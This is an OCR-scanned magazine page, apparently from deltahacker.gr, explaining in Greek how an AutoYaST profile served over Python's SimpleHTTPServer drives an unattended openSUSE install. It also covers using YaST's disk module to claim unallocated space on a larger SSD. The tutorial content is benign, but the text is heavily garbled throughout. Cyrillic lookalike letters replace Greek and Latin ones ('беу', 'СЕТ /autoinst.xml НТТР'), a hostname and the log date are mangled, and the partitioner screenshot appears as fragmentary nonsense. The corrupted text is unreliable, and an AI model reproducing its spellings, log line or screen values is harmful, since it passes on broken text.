192.168.193.250 - - (095/2и1/2017 19:00:09] "СЕТ /autoinst.xml НТТР/1.1" 200 - 


Ίσως беу προλάβουμε να δούµε κάτι σχετικό στα μηνύματα που εμφανίζονται στην οθόνη του νέου συστήµατος, 
παρατηρώντας όµως то τερματικό από το οποίο φορτώσαμε το SimpleHTTPServer module της Python αμέσως 
διαπιστώνουμε πως то AutoYaST profile διαβάστηκε από τον installer. 


Καθ’ όλη τη διάρκεια της εγκατάστασης беу θα χρειαστεί να κάνετε κάτι, όλα θα 
γίνουν αυτοματοποιηµένα. Κάποια στιγµή о installer θα επανεκκινήσει το σύστημα 
και θα ξεκινήσει µια διαδικασία αναγνώρισης και ρύθμισης του hardware. Θα ако- 
λουθήσει άλλο ένα reboot και θα βρεθούμε μπροστά από ένα πλήρως ρυθµισµένο 
λειτουργικό, παρόμοιο µε εκείνο στο оѕиѕе0.со!дег.і5. 


Βήμα 3 | προσαρμογή στο hardware του εκάστοτε host 


Ένα ή περισσότερα апо τα PCs στα οποία εγκαθιστάτε το openSUSE σας аотора- 
τα, µε το AutoYaST, ίσως έχουν διαφορετικά χαρακτηριστικά апо το μηχάνημα στο 
οποίο δηµιουργήσατε το AutoYaST profile. Σε τέτοιες περιπτώσεις, µετά την πρώτη 
εκκίνηση του λειτουργικού στο νέο РС, ίσως χρειαστεί να κάνετε μία ἡ δύο ρυθµί- 
σεις. Σκεφτείτε, για παράδειγµα, ότι το αρχικό μηχάνημα είχε έναν μόνο δίσκο SSD, 
χωρητικότητας 128GB. Επιλέξατε να δημιουργήσετε ένα swap partition μεγέθους 
2GB, ενώ όλο τον υπόλοιπο χώρο τον δώσατε στο root partition και, παρεμπιπτό- 
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VTWG, то διαμορφώσατε κατά Ехї4. Τώρα, éva апо τα μηχανήματα στα οποία εγκα- 
θιστάτε το openSUSE αυτόματα, έχει δίσκο SSD χωρητικότητας 512GB. Μετά το 
πέρας της διαδικασίας εγκατάστασης θα διαπιστώσετε ότι ο δίσκος έχει: а) éva 
διαμέρισμα swap μεγέθους 2GB, В) éva root partition μεγέθους 126 (περίπου) СВ, 
καθώς και ү) ελεύθερο χώρο 384GB που беу έχει κατανεμηθεί σε καμία κατάτμηση. 
Είναι κρίµα να μένει όλος αυτός ο χώρος ανεκµετάλλευτος. Ευτυχώς, χάρη στο 
YaST -και συγκεκριµένα χάρη στο module ονόματι disk- εἶναι πολύ εὐκολο να δημι- 
ουργήσετε μία ἡ περισσότερες νέες κατατμήσεις, τις οποίες και θα διαµορφώσετε 
κατά το filesystem της προτίμησής σας. Εναλλακτικά, κι επειδή το Ехі4 filesystem 
το επιτρέπει, έχετε τη δυνατότητα να μεγεθύνετε το root partition __рп καταστρο- 
φικά.., WOTE να καταλαμβάνει περισσότερο χώρο ἡ ακόµη και όλον τον διαθέσιμο 
ελεύθερο χώρο. 


Activities  Үа572- Sat 20:22 


Expert Partitioner 


System View [5 Hard Disk: /dev/sda 
~ (53 osuse2 
~ [5 Hard Disks 
E: 000 Unpartttioned 
μπι 384.01 GIB 
5422 
ІШІ RAID 
(29 Volume Management 
(5) Crypt Files 
[51] Device Mapper 
В nrs 
В ви 
В tmpfs 
gÊ Unused Devices 
dh Device Graph 
dh Mount Graph 
[53 Installation Summary 
È} Settings 
E Log 


Overview Partitions 


Device Size F Enc Type FS Type Label Mount Point Start End 
Idev/sda1 2.00 GiB 29 Linux swap Swap swap ο 260 
/dev/sda2 125.99 GiB Ф Linux native Εχιά / 260 16708 


Move.. || Resize.. || Delete... Expert.. = 


| Finish 


Κατά περιπτώσεις, η αυτοματοποιημένη εγκατάσταση Ва ολοκληρώνεται επιτυχώς αλλά Ва χρειάζονται και Κάποιες 
επεμβάσεις από μέρους µας. Ίσως, π.χ., το νέο σύστημα να έχει µεγαλύτερο δίσκο από το δίσκο του υπολογιστή στον οποίο 
φτιάξαμε το AutoYaST profile, οπότε τώρα έχουµε αποθηκευτικό χώρο που δεν έχει κατανεμηθεί. Χάρη στο module ονόματι 
disk του YaST, αυτή η κατάσταση διευθετείται πανεύκολα. 


Χαρείτε το νέο σας τοπικό δίκτυο µε openSUSE boxes, το οποίο καταφέρατε και 
στήσατε σε χρόνο ρεκόρ. Εκτός από εσάς, να είστε βέβαιοι ότι θα το χαρούν και οι 
χρήστες του. 


75 


deltahacker.gr 


